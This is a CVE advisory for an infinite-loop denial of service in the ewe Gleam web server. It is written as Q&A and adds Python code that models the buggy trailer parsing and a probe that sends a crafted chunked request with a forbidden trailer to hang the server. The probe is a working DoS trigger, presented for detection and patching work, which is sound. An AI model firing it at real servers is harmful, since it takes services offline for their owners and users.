CVE-2026-32873
Infinite Loop Vulnerability in ewe Web Server Causes CPU Hang
Publication date: 2026-03-20
Last updated on: 2026-04-16
Assigner: GitHub, Inc.
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| vshakitskiy | ewe | From 0.8.0 (inc) to 3.0.5 (exc) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-835 | The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop. |
| CWE-825 | The product dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-32873 is a vulnerability in the Gleam web server called ewe, affecting versions 0.8.0 through 3.0.4. The issue lies in the handle_trailers function, which processes HTTP trailer headers in chunked requests. When the function encounters trailer headers that are forbidden or undeclared, it incorrectly recurses with the original unparsed buffer instead of advancing past the rejected header. This causes the same header to be re-parsed repeatedly, resulting in an infinite loop.
This infinite loop causes the BEAM process to wedge at 100% CPU usage with no timeout or escape, effectively causing a denial of service. The vulnerability is exploitable remotely by any unauthenticated client sending specially crafted chunked HTTP requests with forbidden trailers, and no application-level workaround exists because the issue occurs before control returns to application code.
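To make the failure mode concrete, here is an added, deliberately simplified Python model of the bug class described above. It is not ewe's Gleam source (which this page does not reproduce), and the set of forbidden trailer names is an illustrative assumption. The vulnerable function recurses on the original buffer when a trailer is rejected, so the same line is parsed and rejected again on every call; the fixed function recurses on the remainder, so a rejected line is simply skipped. A step guard is added to the vulnerable version only so the demo terminates; the real server has no such escape.

```python
from __future__ import annotations

from typing import Optional

# Illustrative set; the exact list ewe rejects is not stated on this page.
FORBIDDEN_TRAILERS = {"host", "content-length", "transfer-encoding", "trailer"}


def parse_trailer_line(buf: bytes) -> Optional[tuple[str, str, bytes]]:
    """Split one 'Name: value\\r\\n' line off the front of buf.

    Returns (lowercased name, value, remaining bytes), or None when no
    complete line is buffered yet.
    """
    end = buf.find(b"\r\n")
    if end < 0:
        return None
    line, rest = buf[:end], buf[end + 2:]
    name, _, value = line.partition(b":")
    return name.strip().lower().decode("latin-1"), value.strip().decode("latin-1"), rest


def handle_trailers_vulnerable(
    buf: bytes,
    declared: set[str],
    accepted: Optional[dict[str, str]] = None,
    steps: int = 0,
    max_steps: int = 100,
) -> tuple[str, dict[str, str]]:
    """Vulnerable shape: a rejected trailer recurses on the ORIGINAL buffer.

    `max_steps` exists only so this demo returns "hung" instead of recursing
    until Python raises RecursionError; a real server has no such guard and
    spins at 100% CPU.
    """
    accepted = {} if accepted is None else accepted
    if steps >= max_steps:
        return "hung", accepted
    if buf.startswith(b"\r\n"):  # empty line terminates the trailer section
        return "done", accepted
    parsed = parse_trailer_line(buf)
    if parsed is None:
        return "need_more", accepted
    name, value, rest = parsed
    if name in FORBIDDEN_TRAILERS or name not in declared:
        # BUG: `buf` still begins with the rejected line, so the next call
        # parses and rejects the very same header again, forever.
        return handle_trailers_vulnerable(buf, declared, accepted, steps + 1, max_steps)
    accepted[name] = value
    return handle_trailers_vulnerable(rest, declared, accepted, steps + 1, max_steps)


def handle_trailers_fixed(
    buf: bytes,
    declared: set[str],
    accepted: Optional[dict[str, str]] = None,
) -> tuple[str, dict[str, str]]:
    """Fixed shape: always advance past the line just parsed, accepted or not.

    Recursion depth is now bounded by the number of trailer lines, so no
    step guard is needed.
    """
    accepted = {} if accepted is None else accepted
    if buf.startswith(b"\r\n"):
        return "done", accepted
    parsed = parse_trailer_line(buf)
    if parsed is None:
        return "need_more", accepted
    name, value, rest = parsed
    if name in FORBIDDEN_TRAILERS or name not in declared:
        return handle_trailers_fixed(rest, declared, accepted)  # skip, then continue
    accepted[name] = value
    return handle_trailers_fixed(rest, declared, accepted)


if __name__ == "__main__":
    # Constructed trailer section: a forbidden 'Host' trailer then the terminator.
    hostile = b"host: attacker\r\n\r\n"
    declared = {"x-checksum"}
    print("vulnerable:", handle_trailers_vulnerable(hostile, declared))  # ('hung', {})
    print("fixed:     ", handle_trailers_fixed(hostile, declared))       # ('done', {})
```

The same input reaches "done" with the fixed parser because the rejected line is consumed; with the vulnerable parser the only thing that stops it is the demo's step cap, which is exactly the "no timeout or escape" the advisory describes.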
How can this vulnerability impact me?
This vulnerability can cause a denial of service (DoS) condition by making the server process enter an infinite loop at 100% CPU usage. This effectively wedges the process, making it unresponsive and exhausting server resources.
Since the vulnerability is exploitable remotely by unauthenticated attackers, it can be triggered by sending specially crafted chunked HTTP requests with forbidden trailer headers. This can lead to service outages or degraded performance, impacting availability.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability causes the affected ewe server process to enter an infinite loop when processing chunked HTTP requests with forbidden or undeclared trailer headers, resulting in 100% CPU usage and the server process hanging indefinitely.
Detection can be performed by monitoring server processes for unusually high CPU usage, especially when handling chunked HTTP requests.
Additionally, sending crafted chunked HTTP requests containing forbidden trailer headers (such as 'host') can be used as a proof of concept to detect the vulnerability by observing whether the server process hangs or consumes excessive CPU.
An example command to test the vulnerability (using curl with chunked transfer encoding and forbidden trailer headers) could be constructed, but specific commands are not provided in the available resources. [3]
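The answer above does not give a concrete command, and curl has no convenient way to emit HTTP trailers, so here is an added Python probe (not from this page's sources or from the ewe project) that writes the raw chunked request by hand and then waits, with a timeout, for any bytes back. It sends a `Host` trailer, which the answer names as a forbidden trailer; passing `declare=False` instead sends a trailer that was never announced in the `Trailer` header, the other trigger described. The target host and port are assumptions you supply. Because this triggers the real condition, point it only at an instance you own or are authorized to test, and expect a vulnerable server to need a restart afterwards. The in-process "silent server" is a constructed stand-in for a wedged process so the probe can be exercised offline.

```python
import socket
import threading


def build_chunked_request(host: str, trailer_name: str = "Host",
                          declare: bool = True, path: str = "/") -> bytes:
    """Build a chunked POST whose trailer section carries `trailer_name`.

    With declare=True the name is also announced in the Trailer header, so a
    forbidden name such as Host is the rejection trigger; with declare=False
    the trailer is undeclared, the other rejection trigger.
    """
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        + (f"Trailer: {trailer_name}\r\n" if declare else "")
        + "\r\n"
    )
    body = b"5\r\nhello\r\n0\r\n"                  # one 5-byte chunk, then the last-chunk line
    trailers = f"{trailer_name}: probe\r\n\r\n"   # trailer section, then the terminating CRLF
    return head.encode("ascii") + body + trailers.encode("ascii")


def probe(host: str, port: int, timeout: float = 3.0,
          trailer_name: str = "Host", declare: bool = True) -> str:
    """Send the crafted request and classify what happens.

    'responded' / 'closed' : the server answered or dropped the connection
                             (expected from a patched server that rejects the trailer).
    'hang_suspected'       : connection accepted, request sent, nothing back within
                             `timeout`; on a healthy but slow server raise the timeout
                             before drawing conclusions.
    'unreachable'          : could not connect at all.
    """
    req = build_chunked_request(host, trailer_name, declare)
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(req)
            try:
                data = s.recv(4096)
            except socket.timeout:
                return "hang_suspected"
            return "responded" if data else "closed"
    except OSError:
        return "unreachable"


def start_silent_server() -> tuple:
    """Constructed stand-in for a wedged server: accepts connections, never replies.

    Demo/test helper only. Returns (port, stop_event); set the event to shut it down.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)
    stop = threading.Event()

    def run() -> None:
        held = []
        while not stop.is_set():
            try:
                held.append(srv.accept()[0])   # hold the socket open, never read or write
            except socket.timeout:
                continue
        for conn in held:
            conn.close()
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1], stop


if __name__ == "__main__":
    port, stop = start_silent_server()
    print("silent stand-in:", probe("127.0.0.1", port, timeout=1.0))  # hang_suspected
    stop.set()
    # Against a real instance (assumed address): probe("ewe.internal.example", 8080)
```

A patched server is expected to come back with an error response or a closed connection; a result of `hang_suspected` on a server that otherwise answers ordinary requests promptly is the signature to look for, and it should be paired with the CPU-usage check the answer recommends, since the advisory says the process then sits at 100% CPU.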
What immediate steps should I take to mitigate this vulnerability?
The vulnerability is fixed in ewe version 3.0.5. The immediate and recommended mitigation is to upgrade the ewe web server to version 3.0.5 or later.
No application-level workaround exists because the infinite loop occurs inside the read_body function before control returns to application code.
Until the upgrade is applied, monitoring and limiting incoming chunked HTTP requests with trailer headers from untrusted sources may help reduce exposure.